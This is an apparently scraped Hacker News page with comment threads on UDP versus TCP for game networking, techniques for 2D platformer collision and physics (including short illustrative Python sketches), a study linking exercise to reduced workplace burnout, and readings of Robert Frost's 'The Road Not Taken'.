I know the article is language-agnostic, but I don't think anyone would develop their networking modules (in the context of videogames or finance) in anything but C++ (or Erlang/Elixir?).

So could the local experts give their opinion on C++ networking libraries? I know there are a few [1] but how do they compare?

I've only used Qt networking and POSIX sockets (although in C), but the application didn't have strict latency or throughput requirements.

[1] http://stackoverflow.com/questions/118945/best-c-c-network-l...

ninjakeyboard 10 hours ago 0 replies      
You know what I found actually quite amazing: video encoders for linear/live broadcast video feeds send their output over UDP to the next device in the chain. An encoder will often output a stream of video over UDP to devices that then split the video into multiple renditions.
Const-me 8 hours ago 0 replies      
Not every game is latency-critical, and not every game can tolerate packet loss. If those 4-8 players in the game are playing 3-dimensional virtual-reality poker, TCP or even HTTP will work just fine.

I have read the original thread, and the author says somewhere in the comments that it is likely to be similar to what you would see in something like Diablo II. Players exist in a world, attack enemies and interact with NPCs (including trading).

Which makes the article irrelevant to the original question. Games like Diablo 2 are not real-time; they can usually use TCP just fine.

zurn 10 hours ago 1 reply      
The single problem with TCP this rightly points out is head-of-line blocking. But overcoming that still leaves you with the problem of coping with out-of-order or missing events at the app level, with clients and servers seeing events in differing sequences (e.g. a packet sequence of move-duck-fire; now shuffle the move around...). I witnessed one game-engine project implement custom networking on UDP and then disable unreliable and out-of-order messages because of game-logic headaches.

And the payoff is quite small, since packet loss is rare in healthy networks and TCP handles the rare loss pretty efficiently based on ack clocking, not timeouts (fast retransmit, basically same as his idea of "redundantly sending un-acked data").
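For pure state snapshots, the app-level handling of out-of-order packets can be as simple as "latest sequence number wins" — which is exactly what sidesteps the move-duck-fire reordering headache. A minimal Python sketch (names invented; sequence wraparound deliberately ignored):

```python
# "Latest state wins" receiver: packets carrying an older sequence number
# than one already seen are duplicates or late arrivals, and are dropped.

class SnapshotReceiver:
    def __init__(self):
        self.latest_seq = -1
        self.state = None

    def on_packet(self, seq, state):
        if seq <= self.latest_seq:
            return False           # stale or duplicate: discard
        self.latest_seq, self.state = seq, state
        return True

rx = SnapshotReceiver()
rx.on_packet(1, "duck")
rx.on_packet(3, "fire")
accepted = rx.on_packet(2, "move")  # arrives late, after seq 3
assert accepted is False and rx.state == "fire"
```

This only works when packets carry full state, not deltas; real protocols also have to handle sequence-number wraparound.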

toolslive 11 hours ago 0 replies      
I think the topics should be split: you have 'networking', which is about connecting computers, typically using TCP, UDP, RDMA, ... and 'distributed systems', which is about how to use connected computers to achieve something. And yes, both are difficult, but for different reasons:

- networking is hard because the APIs are old, platform-specific and probably don't behave very intuitively. So trying to build messaging systems on top of sockets is not simple (but you will only find that out after you've moved beyond the prototype stage).

- distributed systems is hard because the odds of successfully exchanging messages aren't in your favour.

vans 8 hours ago 0 replies      
What's the point of this insulting article, full of rage? It has no business ranking this high on HN.
nubb 7 hours ago 1 reply      
As a network engineer, this was great. Nobody ever bothers to learn networking.

The article is annoying though; basically it says "use UDP, idiots." I mean, why do we think VoIP uses UDP? Same concept.

If only more devs would implement multicast...

mahouse 15 hours ago 8 replies      
Reading this one could think you would be a fool to use TCP, yet some games (such as World of Warcraft) use TCP exclusively with no problems... What gives?
hmans 13 hours ago 0 replies      
Someone needs a bit of anger management therapy.
mmaunder 8 hours ago 0 replies      
I guess that's one way to package up a fairly fundamental piece of networking knowledge. Wrap the fucker in expletives to get attention.
zobzu 11 hours ago 0 replies      
Netcode is the most difficult part of fast multiplayer games. Then again, one could just read the Quake 3 source - it's actually, 16 years later, still one of the best for that.
tormeh 12 hours ago 2 replies      
>You have whole industries (gaming, video streaming, VoIP) that will laugh at you if you send time critical data over TCP and rightly so

Skype uses TCP, no? Laugh, indeed.

vog 14 hours ago 1 reply      
Wow, so many downvotes.

Why is it considered non-constructive to point out a misleading title? The title is the first impression of an article, and most likely the authors are not aware of that ambiguity.

A guide to implementing 2D platformers higherorderfun.com
301 points by ingve  2 days ago   32 comments top 11
deathanatos 2 days ago 1 reply      
> Before anything on the scene is stepped, determine whether the character is standing on a moving platform. This can be done by checking, for example, whether his center-bottom pixel is just one pixel above the surface of the platform. If it is, store a handle to the platform and its current position inside the character.

I implemented a 2D platformer with moving platforms once; we solved this simply by using another rule in the article the one for ladders:

> when you're in a ladder, you ignore most of the standard collision system, and replace it with a new set of rules.

There was a special flag on the entity for "is on a platform" (and which platform, too); thus, you trivially knew if something was on the platform. During normal collision detection, if you found yourself falling through a platform, your fall was truncated and you were affixed to the platform. (An entity's platform variable became, essentially, Some(a_ref_to_the_platform).) The affixing was two-way, IIRC: the platform knew about you, mainly s.t. when it moved, it could update linked entities. And if it was destroyed (which could happen), it could unref itself from whatever was on it; really, one had a weakref to the other, but I was not that good a programmer then, so it was implemented more manually.

It worked quite well. We tried the whole pixel business, but it was troublesome; the game engine itself needed to deal with characters falling more than 1px per game-state step, so it already knew the "you are falling into a platform" bit.
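The two-way platform/rider link described above might look like this as a toy Python sketch (all class and method names are invented for illustration):

```python
# Sketch of the "is on a platform" link: the platform and its riders
# reference each other, the platform drags riders when it moves, and
# destroying the platform detaches everything standing on it.

class Platform:
    def __init__(self, x, y):
        self.x, self.y = x, y
        self.riders = set()

    def move(self, dx, dy):
        self.x += dx; self.y += dy
        for rider in self.riders:      # riders move with the platform
            rider.x += dx; rider.y += dy

    def destroy(self):
        for rider in self.riders:
            rider.platform = None      # unref ourselves from each rider
        self.riders.clear()

class Entity:
    def __init__(self, x, y):
        self.x, self.y = x, y
        self.platform = None           # roughly Some(platform) / None

    def land_on(self, platform):
        self.platform = platform
        platform.riders.add(self)

p = Platform(0, 10)
e = Entity(3, 10)
e.land_on(p)
p.move(5, 0)
assert (e.x, e.y) == (8, 10)
p.destroy()
assert e.platform is None
```

A production engine would use weak references for one side of the link, as the comment notes, to avoid keeping destroyed platforms alive.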

yoklov 2 days ago 1 reply      
It's fairly disingenuous to say that implementing polygon-based (the article calls it "vectorial") collision detection on platforms is "very difficult to implement properly" without a physics engine.

The collision detection code for this can be done in probably less than a thousand lines (probably less if everything is OBBs). Adding support for arcs, and even bezier curves becomes much, much easier as well (for both, probably another thousand lines, at most). It is also easier to add support for continuous collision detection this way, should that be something you want (although this would increase the amount of code a fair amount).

FWIW, I used to go the pixel-based route, but after having done it this way I'm not sure I would do it again. It ends up being much cleaner, more robust, and easier to extend. I'd go as far as to say that your collision detection and physics code shouldn't have any knowledge of pixels, only your renderer (and maybe the gameplay code, if you insist) should have an idea about these.

I will say that it requires a stronger math background, however, but in all honesty, probably not that much stronger than is required to make the rest of a game.

panic 2 days ago 0 replies      
Matt Thorson, the developer of Towerfall, also has some notes on implementing robust platformer physics: http://mattmakesgames.tumblr.com/post/127890619821/towerfall....

The overall idea is to use integer pixel coordinates (to avoid floating point error accumulation) and to step all physics by one pixel at a time (to avoid fast-moving objects passing through the environment).
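The one-pixel-at-a-time stepping can be sketched as follows (a toy Python model; `solid_at` stands in for whatever collision query the engine provides, and only horizontal movement is shown):

```python
# Step movement one integer pixel at a time and stop at the first blocked
# pixel, so even very fast movers can never tunnel through a wall.

def move_x(x, amount, solid_at):
    """solid_at(x) -> bool; returns the final x after stepping |amount| px."""
    step = 1 if amount > 0 else -1
    for _ in range(abs(amount)):
        if solid_at(x + step):
            break                  # hit a wall: stop on the last free pixel
        x += step
    return x

wall = lambda x: x >= 10           # solid from x = 10 onward
assert move_x(0, 25, wall) == 9    # fast mover stops at the wall, no tunneling
assert move_x(5, -3, wall) == 2
```

Fractional speeds are handled in this scheme by accumulating a float remainder and only moving by its integer part, which also avoids floating-point error build-up.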

Lerc 2 days ago 0 replies      
I think I have implemented all of those methods for various projects.

An extra method of doing platforms that I have used in the past is a simple functional approach: all scene objects return a value for their floor level at a given X. It comes out similar to the vector approach, but can be more dynamic. Anything standing on a floor is standing on an object, so everything is effectively a moving platform, just with most of them stationary. This makes undulating floors easy.
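The functional floor idea might look like this as a toy Python sketch (object and function names are invented, not from the comment):

```python
# Every scene object answers "what is your floor height at this x?",
# and the character stands on the highest answer beneath it. Flat ground,
# undulating floors, and moving platforms all share the same interface.

class FloorObject:
    def __init__(self, x0, x1, height_fn):
        self.x0, self.x1 = x0, x1
        self.height_fn = height_fn    # height as a function of x: may undulate

    def floor_at(self, x):
        return self.height_fn(x) if self.x0 <= x <= self.x1 else None

def ground_height(objects, x):
    heights = [h for obj in objects if (h := obj.floor_at(x)) is not None]
    return max(heights, default=None)

scene = [
    FloorObject(0, 100, lambda x: 0),            # flat ground
    FloorObject(20, 40, lambda x: 10 + x // 4),  # a sloped platform
]
assert ground_height(scene, 10) == 0
assert ground_height(scene, 24) == 16            # 10 + 24 // 4
```

Moving platforms fall out for free: a platform that shifts just returns different heights on the next query, with no special-case attachment logic.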

zamalek 2 days ago 3 replies      
Did some really cool stuff with "pixel-perfect bitmask collision" back in the day:

1. You treat 64-bit unsigned longs as 8x8 pixel squares.

2. You do "bit magic" (shifts etc.) to align the mask of your character/entities with the landscape.

3. AND the two masks.

4. Nonzero = collision.

I never really used it for anything (wasn't sure if it was faster than more naive approaches), but it was a neat concept/challenge. I guess it would help if you were on a resource-constrained environment (NES etc.).
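The 8x8 bitmask trick can be sketched in Python (bit layout and helper names are invented; only non-negative shifts are handled in this sketch):

```python
# Each 64-bit integer is an 8x8 tile of pixels (bit set = opaque).
# Shift one mask into the other's frame, AND them, and any nonzero
# result means overlapping opaque pixels, i.e. a collision.

def make_mask(rows):
    """rows: 8 strings of '.'/'#'; returns the 8x8 tile as a 64-bit int."""
    mask = 0
    for y, row in enumerate(rows):
        for x, ch in enumerate(row):
            if ch == '#':
                mask |= 1 << (y * 8 + x)
    return mask

def shifted(mask, dx, dy):
    """Shift a mask dx right and dy down within the tile; bits fall off."""
    out = 0
    for y in range(8):
        row = (mask >> (y * 8)) & 0xFF
        ny = y + dy
        if 0 <= ny < 8:
            out |= ((row << dx) & 0xFF) << (ny * 8)
    return out

def collides(a, b, dx, dy):
    return (shifted(a, dx, dy) & b) != 0

block = make_mask(["####....", "####....", "####....", "####....",
                   "........", "........", "........", "........"])
assert collides(block, block, 0, 0)
assert not collides(block, block, 4, 0)   # shifted clear of the other block
assert collides(block, block, 3, 2)
```

On hardware with fast 64-bit ops, the per-tile test collapses to a couple of shifts and one AND, which is presumably why it appealed for resource-constrained targets.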

i336_ 2 days ago 1 reply      
I've actually been looking to explore this for literally ages... I hope to play with this sort of thing someday at both ends of the spectrum, to get a bit of a practical education on how architectures have developed over the past two dozen years or so, and hopefully to have a bit of fun.

On the one hand, I'm really, really interested to understand how the pieces fit together such that it was possible to have supersmooth sidescrolling on the 4MHz CPU in a Game Boy.

On the other hand, I want to learn how to best optimize for the CPU/GPU targets in current- and next-gen desktop and portable devices (PCs, laptops, phones, tablets, etc). It might sound bizarre to want to get the most out of even a 4k-core GPU just for 2D (with maybe some fancy parallax), but 3x4K is going to be a thing more frequently than not going forward... and a pixel-perfect 144fps sidescroller would look truly amazing on something like that.

I want to understand both sides of the coin in-depth so I can optimize for each but also maintain a sense of balance: the majority of game engines are overwhelmingly future-oriented, and when presented with older hardware something like Unity will invariably choke or at least stutter, and Box2D likely would as well.

I do at least realize the complexity in building a game engine from the ground up - like I said before, this is purely for fun and education - but I have no idea where to actually start, no knowledge of older architectures (and their quirks), I still need to learn assembly language (!!) and machine code (it's on the todo list... has been for months...), etc etc.

Advice will truly be hugely appreciated.

benihana 2 days ago 0 replies      
Great read! I'm a web developer but I play the hell out of video games. I really liked how the author explained what effects you're trying to mitigate in the collision detection algorithms. It instantly put it into a very clear and familiar context for me - I haven't programmed under these conditions, but I've definitely played games and seen silly things like this happen:

>This will prevent characters from popping through the slope from the opposite side.

>If you don't ensure this, the player will move horizontally right off the ramp for a while, until gravity catches up and drags him down, making him bounce on the ramp instead of smoothly descending it.

leni536 2 days ago 0 replies      
For vector-based levels, I would point to Elasto Mania as an early example. I don't know how well it fits the "platformer" category, though. It obviously provides the benefit of having surface normals naturally, compared to the bitmask model.
melling 2 days ago 1 reply      
If you want to watch a game being built, follow this project: https://handmadehero.org
shadowmint 2 days ago 0 replies      
Sadly the blog was abandoned back in 2012, and never saw any other cool updates.
Reducing workplace burnout: the benefits of exercise nih.gov
255 points by mmariani  3 days ago   174 comments top 22
david_shaw 3 days ago 6 replies      
The most interesting part of the study (to me) was this:

> Cardiovascular exercise was found to increase well-being and decrease psychological distress, perceived stress, and emotional exhaustion. Resistance training was noticeably effective in increasing well-being and personal accomplishment and to reduce perceived stress.


> Different types of exercise may assist employees in different ways.

I've always been told that exercise improves feelings of well-being, reduces stress, etc. I've never heard about the different effects that different types of exercise can have on the psyche -- although it makes sense, for example, that improving at resistance training would lead to a sense of accomplishment. If taken to its logical conclusion, this study implies that we should be working out in different ways based on the psychological ailments we may be experiencing. That's fascinating to me.

myth_buster 3 days ago 8 replies      
Could this be a case of missing the forest for the trees? Perhaps the burnout is happening due to stagnant wages and inflation, which force people to work longer or take on additional unfulfilling jobs. Exercise may only be helping workers handle additional stress without improving their well-being on the whole.

Productivity vs Hourly Wage [0]

GDP vs Median household income [1]

[0] http://www.decisionsonevidence.com/wp-content/uploads/2011/0...

[1] https://upload.wikimedia.org/wikipedia/en/e/e2/US_GDP_per_ca...

6stringmerc 3 days ago 5 replies      
After a few years in the health industry, whenever I see a statement like this one:

Organisations wishing to proactively reduce burnout can do so by encouraging their employees to access regular exercise programs.

My brain translates the suggestion into real-world application, which in the US seems to go like this:

Organisations wishing to proactively increase wellness metrics and reduce their expenditures can do so by instituting highly invasive biometric screening programs and jacking up premiums, while offering no actual time or fiscal incentive to join a gym or exercise independently.

Quick apology if that sounds terribly cynical, but it seems like the go-to path by businesses. I say this as a person who feels grateful to have a job where I can go home and work out for 20 minutes 3 times during the work week. Also, I know that eating "better" takes time and effort both in the sourcing and production of materials, which may or may not be less expensive to the individual in the short/long term.

samstokes 3 days ago 3 replies      
My own anecdata definitely supports this study's conclusion. I wish I'd been in the habit of regular exercise when I first got into the startup scene.

That said, I fear the outcome of their recommendation:

> Organisations wishing to proactively reduce burnout can do so by encouraging their employees to access regular exercise programs.

If burnout is prevalent enough among an organisation's workforce for "proactively reducing" it to be strategically worthwhile, that suggests it would be much more important to introspect on why they are burning out so many of their employees in the first place. e.g. does your culture explicitly value "hard work", which can turn into encouraging unpaid overtime? When you celebrate hitting deadlines, do you look back on whether it was thanks to good planning or "crunch mode"? Do people understand the reasons for decisions that affect them?

Not that these are easy problems to fix, but I'd hate to see companies start thinking burnout is something that can be "fixed" with a gym discount and workout incentive schemes.

nutmeg 3 days ago 2 replies      
In a documentary about Studio Ghibli, they show how every couple of hours everyone gets up from their desks and does calisthenics, even Miyazaki.

I don't know if this is common in Japan or just a Studio Ghibli practice, but I was impressed with the idea of it.

shostack 3 days ago 0 replies      
I'm very fortunate to work for a company that values health and wellness to the point where they provide workout facilities for employees and trainers twice a week.

I used to never go to a gym, and I'd be lucky if I could convince myself to do some bicep curls and situps/pushups at home in-between rounds of various games I play. I have weak discipline in that area. I've always had a high metabolism to the point where I was "scrawny", so I would never get fat from not working out, but I definitely felt the drain on my energy, and overall physical fitness and strength.

Since starting at this company, while I've lost 15 pounds (not something skinny people typically aim for), I've gained a ton of muscle, and am physically in the best shape I've been in my entire life.

The confidence that comes from that is one thing, but the increased energy and how it has helped me focus on work while reducing stress from juggling many balls are side benefits that were completely unexpected, and perhaps the greatest benefits. The fact that it was so noticeable to me was what really blew me away--it was literally night and day.

TBH, I likely wouldn't do this though if we just had the gym and no trainers--I'm one of those folks who needs someone giving them instructions in the gym and yelling at them when they are slacking or doing it wrong. I'd wager that this has driven a significant productivity boost for myself (and likely others here) because of the overall increase in energy. I also end up focusing on tough work problems I'm trying to solve during my workouts because of the amazing increase in focus I have, and it is amazing to be able to focus with that level of clarity.

It also probably helps cut down indirectly on insurance claims which is a nice plus.

In this day and age of always being connected, and having 50 million things to juggle at once, it is easy to be overwhelmed. There's something about a solid workout that just forces all of these extraneous thoughts from your head and lets you focus on 1-2 things that I personally attribute to helping reduce the risk of burnout.

The flip-side of course is ensuring proper work/life balance, and I'd say that is pretty healthy here as well (and was one of the deciding factors in me choosing to work here vs. elsewhere). Companies really need to embrace it and promote it as part of their culture, otherwise it becomes one of those things that they need to try to fit in along with everything else in an unsustainable way.

larkinrichards 3 days ago 0 replies      
As a long distance runner I have no doubt there's value to exercise. It pays to be healthy. It's also hard to stick to an exercise plan year round.

This is a small-sample-size study that only lasted 4 weeks. Anecdotally, longer-duration exercise regimes can themselves result in burnout - it's hard to make them a habit.

Perhaps the takeaway here is that a short-term exercise regime can serve to distract you from the work that is burning you out?

stephendicato 3 days ago 0 replies      
Eat healthy food. Exercise. Get enough sleep.

You will feel better; both physically and mentally. Positive habit leads to more positive habit. Pay attention to how you feel. You don't need scientific studies to prove these things are "good" for you.

mangeletti 2 days ago 0 replies      
I workout at the Golds here in Jupiter, FL every day after work. It started, like many times before, as a, "That's it! I'm getting into shape!", back in February. I wanted to put on some muscle weight (went from 180lbs in Feb to now 208lbs; my goal is somewhere around here). Then, like very few times before, it became an addiction. The exhilaration of high speed running (I'll set the treadmill to 12mph and see how long I can run at that speed - usually no more than 1/4 mile), the feeling of accomplishment after weights (I do weights every day, treadmill is just my warmup).

My stress and anxiety (had serious anxiety since 2012 - drugs did nothing to help) have been reduced drastically. It's very strange because generalized anxiety disorder is more of an epinephrine issue, but when you have it it feels very much mental. It's not until you start finding relief from working out that you start to accept that it is truly a physiological issue. All the fears (worrying about loved ones, worrying about having some disease, worrying about job security, etc.) just fade away with each new workout. It just takes a couple months to get to this point.

gorena 3 days ago 5 replies      
How are you supposed to find time to exercise when you're working 10-12 hours a day? I can barely find time to clean my apartment.

And if you're not (can I have your job?), you're probably less likely to be burning out.

amelius 3 days ago 1 reply      
One tip: if you feel you are close to a burnout, sleep. Sleep a lot.
kazinator 3 days ago 5 replies      
The sense of well-being from endurance exercise such as running is phony, however. You're not solving any problems when you go for a run. (And I don't mean technical problems whereby you figure out some software bug while you're out covering the miles, which is great!)

Well, sure, you're temporarily solving the dependent problem of discomfort from the stress caused by problems, which is a problem itself.

You have to use the sense of well-being as a motivator to actually confront problems when you come back from the roads or trails, rather than as a "drug" to escape from them.

the-dude 3 days ago 1 reply      
So let me get this straight: at a place where they already burn you out, they will eventually force you to work even more by 'working out'?

Uhhh, no thanks.

nazgulnarsil 2 days ago 0 replies      
If you're a person for whom efficiency is highly motivating:http://lesswrong.com/lw/juc/optimal_exercise/
nikolaj 3 days ago 0 replies      
It is nice to have NIH give us a good justification for having a surfboard rack in the office :)
languagehacker 3 days ago 0 replies      
Rad, now let's repeat it a few dozen times with a larger sample size, or it's an anecdote
zitterbewegung 2 days ago 0 replies      
I love working out. It is so much fun now I have so much more energy!
spacemanmatt 2 days ago 2 replies      
Wow, not one mention of yoga. It worked for me.
beachstartup 3 days ago 1 reply      
the best thing i've done in the past year is fork over a bunch of money to a personal barbell coach to get my ass up and into the gym on a regular schedule. he also supervises my general cardio routine.

i'm simply unable to do it myself without the external personal and financial accountability. but once the money changes hands, i look at it like a business transaction / work and it taps into a different set of motivations in my head.

if you've had false starts and other trouble getting on a resistance and cardio program, try hiring a good trainer. if you're intrinsically motivated to be fit, count your blessings.

tomjen3 3 days ago 8 replies      
At this point it would be news if exercise isn't beneficial for $CONCERN.

So the question is: how do we make it so that people want to get off their ass and exercise? Considering the general state of health in most first world countries (especially given the recent news that half of US adults are either diabetic or pre-diabetic), this may very well be the question in public health.

And yet we almost never see any research about this.

anti-shill 3 days ago 0 replies      
anything possible to get more work out of us can only be a Good Thing
cowardlydragon 3 days ago 1 reply      
The Most Misread Poem in America theparisreview.org
275 points by dnetesn  2 days ago   273 comments top 39
creeble 2 days ago 9 replies      
David Orr gave an interview on PBS NewsHour that was far less overwrought (http://www.pbs.org/newshour/bb/weve-gotten-wrong-robert-fros...). It got to the point quickly:

"DAVID ORR: He claims that he wrote it because he used to go on walks with the English poet Edward Thomas, because Frost spent a brief time in England. It was actually the beginning of his career as a poet.

And what he would like to say at readings afterward is that he and Thomas would go on these walks, and then Thomas, who has a somewhat more romantic sensibility than Frost, Thomas would always regret whatever path they had taken.

And then afterward, he would say, well, we really should have gone to the right. I could have shown you something over there. We should have gone to the left. I could show you something over there.

And Frost was very amused by this. And so he wrote the poem as a kind of joke at his friend's expense."

In other words, it's more about regret than making the right choice, or that you deceive yourself sometimes by dwelling on a choice that is actually perfectly random. Or a million other interpretations...

Grue3 2 days ago 18 replies      
Has anyone considered that the roads are equally travelled precisely because every traveller chooses the less travelled path?

Could the poem actually be a commentary on load balancing?

aresant 2 days ago 3 replies      
What is truly meta is that this entire "misunderstanding" is CENTRAL to the poem's popularity.

Variations of this story and headline have been popping up for years - like in the wonderfully informative "Top 10 Most Misunderstood Lines in Literary History" (1)

Or heck, as a monologue in Orange is the New Black (2)

Didn't see it there because you're too high-brow and busy, so saw it in business insider last year like me (3)?

The poem's dual meaning is central to its popularization - similar to the "big reveal" that drove The Sixth Sense to become one of the top 100 grossing movies of all time.

(1) http://www.toptenz.net/top-10-most-misunderstood-lines-in-li...

(2) http://www.slate.com/blogs/browbeat/2013/08/15/orange_is_the...

(3) http://www.businessinsider.com/frosts-road-not-taken-poem-in...

(4) https://en.wikipedia.org/wiki/The_Road_Not_Taken

unoti 2 days ago 2 replies      
I never felt like the Road Not Taken was about individualism, even when I first read it in high school. To me it's about the fact that sometimes you have to make momentous decisions in life, in which neither choice is clearly right or wrong. Either way you choose, the choice is defensible, but once you make the choice, you can't go back. I decided to go into computers, instead of joining the Air Force and becoming a pilot, for example. Sometimes in life you will meet someone who clearly could have been your soulmate, but you decide to let the acquaintance lapse. I wanted to spend a couple of years in the Peace Corps, learn another language, and help people build power plants in remote locations, but I chose to get married and start making babies instead. And I look back on these kinds of choices and say I made the right choice. But no matter what choice you make, it makes all the difference. Isn't this what the poem is about?

Regardless of what the poet says, I think the important thing is to be out there on that road, travelling, and doing your best. It's all too easy to stay in your comfort zone forever rather than travelling.

Edit: corrected title. Apologies!

RodericDay 2 days ago 2 replies      
I tend to love articles that tease a bit before revealing what they're about, but I found this one a bit overwrought.

tl;dr: it's about Frost's "The Road Not Taken" (Two roads diverged in a wood, and I / I took the one less traveled by, / And that has made all the difference).

This article, at its clearest, says:

> Certainly it's wrong to say that The Road Not Taken is a straightforward and sentimental celebration of individualism: This interpretation is contradicted by the poem's own lines.

However, the thrust of the whole article is better captured by its soggy, everybody-wins non-conclusion:

> The poem both is and isn't about individualism, and it both is and isn't about rationalization. It isn't a wolf in sheep's clothing so much as a wolf that is somehow also a sheep, or a sheep that is also a wolf

jameshart 2 days ago 4 replies      
"It may be the best example in all of American culture of a wolf in sheep's clothing."

Not sure about that. I suspect Springsteen's Born in the USA takes that crown, or perhaps any number of satires that have been taken at face value (looking at you Paul Verhoeven).

a3n 2 days ago 1 reply      
It is in fact my favorite poem.

I've never thought of it as a triumph of choice, "See, it's because I chose thus!"

And I've never thought of it as self-deception, which I think is what the article says. A poem is in some sense our own, but to the extent that you can be wrong about a poem, I think this article is wrong.

I think it's merely a wonderful acknowledgement that choosing different paths does make a difference, even when it doesn't appear to matter at the time. Frost's character wasn't making an obviously important choice between the paths. But way did in fact lead to way, and life was probably different, partially determined, because of this metaphorical, inconsequential choice of direction.

My other favorite Frost poem is "The Death of the Hired Man," from which we get the line "Home is the place where, when you have to go there, they have to let you in."

joaorico 2 days ago 0 replies      
Robert Frost himself wrote about this intentional light mocking [0]:

"I suppose I was gently teasing them." [1]

"but about a friend who had gone off to war, a person who, whichever road he went, would be sorry he didn't go the other." [2]



"On one occasion he [RF] told of receiving a letter from a grammar-school girl who asked a good question of him: 'Why the sigh?' That letter and that question, he said, had prompted an answer.

Amherst Mass April 1925

"Dear Miss Yates:

No wonder you were a little puzzled over the end of my Road Not Taken. It was my rather private jest at the expense of those who might think I would yet live to be sorry for the way I had taken in life. I suppose I was gently teasing them. I'm not really a very regretful person, but for your solicitousness on my behalf I'm

your friend always

Robert Frost"

[Finger, L. L.: "Frost's 'The Road Not Taken': a 1925 Letter come to Light", American Literature v.50]



"(a) One stanza of 'The Road Not Taken' was written while I was sitting on a sofa in the middle of England: Was found three or four years later, and I couldn't bear not to finish it. I wasn't thinking about myself there, but about a friend who had gone off to war, a person who, whichever road he went, would be sorry he didn't go the other. He was hard on himself that way. (RF, Bread Loaf Writers' Conference, 23 Aug. 1953; tape recording)."

"(c) Frost said that he wrote the poem, 'The Road Not Taken' for his friend [Edward Thomas] and sent it to him in France, getting the reply, 'What are you trying to do with me?' (L. Mertins: Robert Frost)"

[Thompson, Lawrance: Robert Frost: The Years of Triumph, Notes.]


[0] http://www.retiredtractors.com/Frost/Roadfrost.html

kazinator 2 days ago 0 replies      

 The Fork Not Taken

 Two spaces forged in the obscure core
 And sorry I could not both address
 And be one stream of loads and stores
 Blocked while tables copy, bored
 Yielded to the next process(0)

 I got the new one, once unblocked
 And having perhaps the better claim,
 Because it was COW(1), not yet untwained(2)
 Though as per that POSIX doc,
 The two should look about the same.

 ---
 0. Not accurate.
 1. Hay, cows like it grassy!
 2. Naive misconception that there is a difference.

molotv 2 days ago 3 replies      
Clicked thru expecting it to be about "Mending Wall" http://writing.upenn.edu/~afilreis/88/frost-mending.html

"Good fences make good neighbors." is often misused to mean the opposite of what it does in that poem.

...at least I guessed the poet correctly.

CurtMonash 2 days ago 1 reply      
My wife -- who has taught poetry at the college level as well as writing a whole lot of popular novels -- reminds me from time to time of the "intentional fallacy". What she means by that -- I think :) -- is that the author isn't the sole determinant of a work's meaning.

So (while she's unavailable to be asked at the moment) I'm pretty sure she'd agree that the poem is about both the things it's often claimed to be about. Indeed, some of the works she and I both admire the most are ones that work on several levels at once.

kej 2 days ago 1 reply      
Distantly related, The Road Not Taken is also an excellent short story by Harry Turtledove that the HN crowd would probably appreciate: http://www.eyeofmidas.com/scifi/Turtledove_RoadNotTaken.pdf
DarkTree 2 days ago 4 replies      
Similarly lost in meaning is Frost's "Stopping by Woods on a Snowy Evening" which is a beautiful poem, but many people don't see the suicidal undertone. I've had it memorized for years and only just learned about this.
injulkarnilesh 1 day ago 0 replies      
It's already been well explained in Orange Is the New Black. Here: https://www.youtube.com/watch?v=EAkYlhhFvbk
jsalit 2 days ago 0 replies      
Also presented here by John Green - https://www.youtube.com/watch?v=snQvRZ2vDHE
matt_morgan 2 days ago 1 reply      
Fantastic. It's not about treading your own path. It's about how we embellish our own pasts. I didn't know.
andreaferretti 2 days ago 9 replies      
I may be ignorant, but I find it weird that this is reported as the most famous poem of the 20th century in America, and possibly the world. In fact, I had never heard about it at all.

Honest question: is it that well-known? I don't think in Italy it is all that common. Or again, it may be just me...

midnightmonster 2 days ago 0 replies      
Frost's duplicity (sometimes triplicity, maybe more) is part of his charm. Yet if there were not also insight and beauty, I think the charm--the mere pleasure in being as clever as the speaker (if not as clever as the poet)--would wear thin.

I truly love Frost, but I love even more Gerard M Hopkins. One gets the feeling Hopkins resorts to dense layers of images not to share a joke with the sufficiently-clever reader, but in desperate earnestness to show what can't be said in prose. "Look--look! See this beautiful/terrible/mysterious thing!"

nsxwolf 2 days ago 1 reply      
If you have only the poem, the common interpretation is perfectly reasonable. Frost said the poem was "tricky", which is a clue from the poet that the common interpretation could be wrong. But what gives the poem meaning? Are you allowed to interpret it yourself? Or does the poet's obscured intent trump that?

In Blade Runner, is Deckard really a Replicant just because Ridley Scott said so later? There's a few clues in various cuts of the film, but nothing is a slam dunk.

x0054 1 day ago 2 replies      
Ok, an honest question here. And English is my second language, so maybe this is why, but this middle part sounds like complete nonsense to me. Is it just me and I don't know how to read poems? Is it how people used to talk back in the day?

> And both that morning equally lay
> In leaves no step had trodden black.
> Oh, I kept the first for another day!
> Yet knowing how way leads on to way,
> I doubted if I should ever come back.

I think I can understand the rest of the poem pretty well, but that 3rd stanza just sounds like random words just tossed together. No? Maybe I just don't get poems.

electricblue 2 days ago 1 reply      
It seems to me that the poem is more about regret than the stories we tell ourselves about our lives to make us feel better about the randomness of the universe. The poet desperately wants to know what would've happened (if anything) on the other side of the 'difference' but can never know.
marquis 2 days ago 0 replies      
The NZ ad mentioned: https://www.youtube.com/watch?v=1wwXfAFQoh8 (NZ isn't a large country: those roads probably ran to the same town anyway.)
adregan 2 days ago 0 replies      
I like to think that Roland Barthes would have loved to use "The Road Not Taken" in his piece "Death of the Author"[0]. Truly, at a scale that's frankly staggering, agency has been given to the reader, though one could also argue that the clipped version of the poem often remembered is a case of remixing and rewriting and that the agency isn't merely passive interpretation but a very active creative endeavor.

0: http://www.ubu.com/aspen/aspen5and6/threeEssays.html#barthes

aaroninsf 2 days ago 0 replies      
ITT: many well-spoken comments reflecting how different personality types (or if you prefer, ways of thinking, or, viewing or understanding the world...) have very different relationships to poetry.

No such codification is perfect, but I find the Myers-Briggs binning a useful shorthand for understanding how different colleagues relate to the world (and respond in different ways to different kinds of problem, management strategy, social environment, etc...)...

...and in this thread there are comments which would make me bin people immediately. :)

(There are no good or bad bins; just differences.)

ap22213 2 days ago 1 reply      
I'm particularly struck by the part

"...long I stood
And looked down one as far as I could
To where it bent in the undergrowth;"

It reminds me of my over-analysis in developing software. Sometimes, I over think things, try to predict the outcomes of things, spend lots and lots of time considering what's behind the 'bend': what's the perfect solution. Analysis paralysis.

But, at a certain point, the analysis gives way to intuition. I choose the path that 'feels' best, knowing that many different paths could have been just as right.

kazinator 2 days ago 1 reply      
In a different category, the "most too-literally-applied" poem in American administration, however, is Emily Dickinson's Tell all the Truth but tell it slant--.
eggoa 2 days ago 0 replies      
I'd like to think that those who appropriate the poem for car commercials and such are fully aware of the poem's meaning, but are exercising a subversive irony.
jmadsen 2 days ago 0 replies      
I'll allow myself a semi-related tangent, just for the heck of it.

